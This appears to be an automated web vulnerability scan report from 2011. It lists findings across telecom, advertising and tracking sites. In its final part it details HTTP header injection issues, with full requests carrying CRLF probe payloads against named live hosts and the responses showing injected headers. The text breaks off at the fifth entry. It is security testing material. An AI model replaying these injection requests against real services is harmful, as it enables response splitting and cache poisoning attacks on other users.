19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

19.17. http://frontier.com/Controls/VirtualCode.ashx

19.18. http://frontier.com/Controls/VirtualCode.ashx

19.19. http://frontier.com/Js/formHelpers.js

19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js

19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js

19.22. http://frontier.com/Js/s_code.js

19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js

19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js

19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js

19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js

19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js

19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js

19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg

19.30. http://frontier.com/images/FTRMain/gradientBox.png

19.31. http://frontier.com/images/FTRMain/small_arrow.png

19.32. http://frontier.com/images/icon_print.gif

19.33. http://frontier.com/js/jquery/jquery.numeric.js

19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share

19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.38. http://www.facebook.com/extern/login_status.php

19.39. http://www.facebook.com/extern/login_status.php

19.40. http://www.facebook.com/extern/login_status.php

19.41. http://www.facebook.com/extern/login_status.php

19.42. http://www.facebook.com/extern/login_status.php

19.43. http://www.facebook.com/extern/login_status.php

19.44. http://www.facebook.com/extern/login_status.php

19.45. http://www.facebook.com/extern/login_status.php

19.46. http://www.facebook.com/extern/login_status.php

19.47. http://www.facebook.com/extern/login_status.php

19.48. http://www.facebook.com/extern/login_status.php

19.49. http://www.facebook.com/extern/login_status.php

19.50. http://www.facebook.com/extern/login_status.php

19.51. http://www.facebook.com/extern/login_status.php

19.52. http://www.facebook.com/plugins/activity.php

19.53. http://www.facebook.com/plugins/like.php

19.54. http://www.facebook.com/plugins/like.php

19.55. http://www.facebook.com/plugins/like.php

19.56. http://www.facebook.com/plugins/like.php

19.57. http://www.facebook.com/plugins/like.php

19.58. http://www.facebook.com/plugins/like.php

19.59. http://www.facebook.com/plugins/like.php

19.60. http://www.facebook.com/plugins/like.php

19.61. http://www.facebook.com/plugins/like.php

19.62. http://www.facebook.com/plugins/like.php

19.63. http://www.facebook.com/plugins/like.php

19.64. http://www.facebook.com/plugins/like.php

19.65. http://www.facebook.com/plugins/like.php

19.66. http://www.facebook.com/plugins/like.php

19.67. http://www.facebook.com/plugins/like.php

19.68. http://www.facebook.com/plugins/likebox.php

19.69. http://www.facebook.com/plugins/likebox.php

19.70. http://www.facebook.com/plugins/likebox.php

19.71. http://www.fairpoint.com/scripts/script.js

19.72. http://www.frontier.com/Js/s_code.js

19.73. http://www.frontierhelp.com/

19.74. http://www.frontierpages.com/scripts/s_code.js

19.75. http://www.vonage.com/

19.76. http://www.vonage.com/

19.77. http://www.vonage.com/googlesearch/cluster.js

19.78. http://www.vonage.com/search.php

19.79. http://www.whitefence.com/static/Seymour.js

20. Social security numbers disclosed

21. Credit card numbers disclosed

21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250

21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

21.3. http://search.yahoo.com/search

22. Robots.txt file

22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage

22.2. http://a.adready.com/campaign_event/impression

22.3. http://a.analytics.yahoo.com/fpc.pl

22.4. http://ad.turn.com/server/ads.htm

22.5. http://ad.yieldmanager.com/pixel

22.6. http://ads.bluelithium.com/iframe3

22.7. http://ads.pointroll.com/PortalServe/

22.8. http://adserver.teracent.net/tase/ad

22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0

22.10. http://api.facebook.com/restserver.php

22.11. http://api.recaptcha.net/challenge

22.12. http://as.casalemedia.com/j

22.13. http://as1.suitesmart.com/99917/G15493.js

22.14. http://autos.yahoo.com/

22.15. http://b.scorecardresearch.com/b

22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js

22.17. http://cdn.optmd.com/V2/80181/197812/index.html

22.18. http://cdn.turn.com/server/ddc.htm

22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153

22.20. http://comcast-www.baynote.net/baynote/tags3/common

22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf

22.23. http://ehg-verizon.hitbox.com/HG

22.24. http://espanol.vonage.com/mpel.js

22.25. http://event.rtrk.com/event/

22.26. http://finance.yahoo.com/

22.27. http://fonts.googleapis.com/css

22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

22.29. http://frontier.com/winwin1

22.30. http://g-pixel.invitemedia.com/gmatcher

22.31. http://games.frontier.com/

22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

22.33. https://go.ooma.com/activate

22.34. http://gws.maps.yahoo.com/MapImage

22.35. http://iar.worthathousandwords.com/iar.gif

22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

22.37. http://int.teracent.net/tase/int

22.38. http://integrate.112.2o7.net/dfa_echo

22.39. http://ips-invite.iperceptions.com/webValidator.aspx

22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

22.41. https://login.aptela.com/cgi/login.cgi

22.42. https://login.comcast.net/login

22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

22.45. http://movies.yahoo.com/

22.46. http://music.yahoo.com/

22.47. http://new.music.yahoo.com/

22.48. http://o.analytics.yahoo.com/fpc.pl

22.49. http://pagead2.googlesyndication.com/pagead/imgad

22.50. http://pixel.everesttech.net/2565/i

22.51. http://pixel.fetchback.com/serve/fb/pdc

22.52. http://pixel.invitemedia.com/data_sync

22.53. http://pixel.quantserve.com/api/segments.json

22.54. http://postcalc.usps.gov/WebResource.axd

22.55. http://r.casalemedia.com/r

22.56. http://realestate.yahoo.com/

22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf

22.58. http://search.keywordblocks.com/

22.59. http://search.yahoo.com/search

22.60. http://segment-pixel.invitemedia.com/pixel

22.61. http://sensor2.suitesmart.com/sensor4.js

22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

22.63. http://servicetips.whitefence.com/

22.64. http://shopping.yahoo.com/

22.65. http://show.partners-z.com/s/show

22.66. http://sitesearch.comcast.com/static.php

22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi

22.71. http://t.invitemedia.com/track_imp

22.72. http://t.pointroll.com/PointRoll/Track/

22.73. http://tags.mathtag.com/view/js/

22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

22.75. http://udmserve.net/udm/img.fetch

22.76. http://us.bc.yahoo.com/b

22.77. http://utdi.reachlocal.com/

22.78. http://utdi.reachlocal.net/index.html

22.79. http://video.music.yahoo.com/crossdomain.xml

22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796

22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

22.82. http://www.aptela.com/lp2011/T2V1

22.83. http://www.burstnet.com/enlightn/8117/3E06/

22.84. http://www.comcast.com/shop/buyflow/default.ashx

22.85. https://www.comcast.com/Localization/Localize.cspx

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.frontier.com/yahoo/fy_excl2.aspx

22.88. https://www.frontier.com/AgentOrdering/Login/

22.89. http://www.google-analytics.com/siteopt.js

22.90. http://www.googleadservices.com/pagead/aclk

22.91. http://www.myfitv.com/portal/recent_tv_elastic

22.92. http://www.ooma.com/

22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm

22.96. http://www.vonage.com/

22.97. http://www.whitefence.com/category/home-phone/

22.98. http://www.zillow.com/app

22.99. http://www2.whitefence.com/a

22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js

23. Cacheable HTTPS response

23.1. https://login.comcast.net/myaccount/images/overlay-bg.png

23.2. https://login.comcast.net/myaccount/images/sprites/base.png

23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png

23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js

23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js

23.8. https://login.comcast.net/myaccount/js/omniture.js

23.9. https://login.comcast.net/myaccount/js/scripts.min.js

23.10. https://login.frontier.com/webmail/

23.11. https://us.etrade.com/e/t/jumppage/viewjumppage

23.12. https://www.comcast.com/Localization/QueryCompletion.cajax

23.13. https://www.comcastsupport.com/ChatEntry/

23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico

23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg

23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png

23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg

23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx

23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx

23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx

23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png

23.22. https://www.comcastsupport.com/chatentry/Default.aspx

23.23. https://www.fidelity.com/welcome/200-free-trades

23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

23.25. https://www.frontier.com/AgentOrdering/Login/

23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx

23.27. https://www.frontier.com/BillPay/Login.aspx

23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

23.29. https://www.frontier.com/Shop/Login.aspx

23.30. https://www.frontiermobile.com/data/

23.31. https://www.frontiermobile.com/favicon.ico

23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D

24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623

24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined

24.12. http://ad.yieldmanager.com/iframe3

24.13. http://ads.pointroll.com/PortalServe/

24.14. http://comcast-www.baynote.net/favicon.ico

24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

24.16. https://login.frontier.com/webmail/

24.17. https://login.frontiermobile.com/

24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

24.20. http://pixel.invitemedia.com/data_sync

24.21. http://sensor2.suitesmart.com/sensor4.js

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. https://us.etrade.com/e/t/jumppage/viewjumppage

24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01

24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01

24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01

24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

24.28. http://www.comcast.com/2go/

24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm

24.31. http://www.vonage.com/googlesearch/get_results.php

24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25. Content type incorrectly stated

25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg

25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js

25.8. http://beacon.dedicatednetworks.com/js/t.aspx

25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js

25.11. http://comcast-www.baynote.net/baynote/tags3/common

25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif

25.14. http://event.adxpose.com/event.flow

25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.17. http://frontier.my.yahoo.com/e/js

25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx

25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

25.20. http://ips-invite.iperceptions.com/webValidator.aspx

25.21. https://login.comcast.net/myaccount/images/overlay-bg.png

25.22. https://login.comcast.net/myaccount/images/sprites/base.png

25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png

25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js

25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js

25.28. https://login.comcast.net/myaccount/js/omniture.js

25.29. https://login.comcast.net/myaccount/js/scripts.min.js

25.30. http://maps.yahoo.com/services/bizloc/america/bizloc

25.31. http://new.music.yahoo.com/chartsHpJS.js

25.32. http://new.music.yahoo.com/rhap_status.html

25.33. http://new.music.yahoo.com/ymusicStayConnected/

25.34. http://pixel.fetchback.com/serve/fb/pdc

25.35. http://realestate.yahoo.com/autocomplete/cities.html

25.36. http://realestate.yahoo.com/robots.txt

25.37. http://sales.liveperson.net/hcp/html/mTag.js

25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

25.42. http://sensor2.suitesmart.com/sensor4.js

25.43. http://sitesearch.comcast.com/

25.44. http://sitesearch.comcast.com/favicon.ico

25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif

25.46. http://www.aptela.com/favicon.ico

25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif

25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif

25.50. https://www.comcast.com/Localization/QueryCompletion.cajax

25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

25.55. http://www.ooma.com/poormanscron/run-cron-check

25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png

25.57. http://www.vonage.com/googlesearch/get_results.php

25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp

25.59. http://www.whitefence.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://ads.pointroll.com/PortalServe/



1. HTTP header injection
There are 47 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90175%0d%0a2b5c414d0be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F&90175%0d%0a2b5c414d0be=1 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d56463713%00%0D%0A1812607ce81; expires=Mon, 05-Dec-2011 11:51:59 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/?90175
2b5c414d0be
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload fda0b%0d%0ab73d971c7c4 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2Ffda0b%0d%0ab73d971c7c4 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564e4a5efed390e8f23a4fed9e9; expires=Mon, 05-Dec-2011 11:51:57 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/fda0b
b73d971c7c4

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://pixel.everesttech.net/2565/c [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 6b47c%0d%0a72c5727bcc8 was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk6b47c%0d%0a72c5727bcc8 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3160904156a23c7e8c69dff72; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR16090415e6ca9e4734959b1; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk6b47c
72c5727bcc8

Content-Length: 382
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_ckstr request parameter is copied into the Set-Cookie response header. The payload 116f0%0d%0afc7a19355f0 was submitted in the RL_ckstr parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0116f0%0d%0afc7a19355f0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:48 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0116f0
fc7a19355f0
; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:41 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_qstr request parameter is copied into the Location response header. The payload d0f4f%0d%0a6e008c98e33 was submitted in the RL_qstr parameter. This caused a response containing an injected HTTP header.

Request

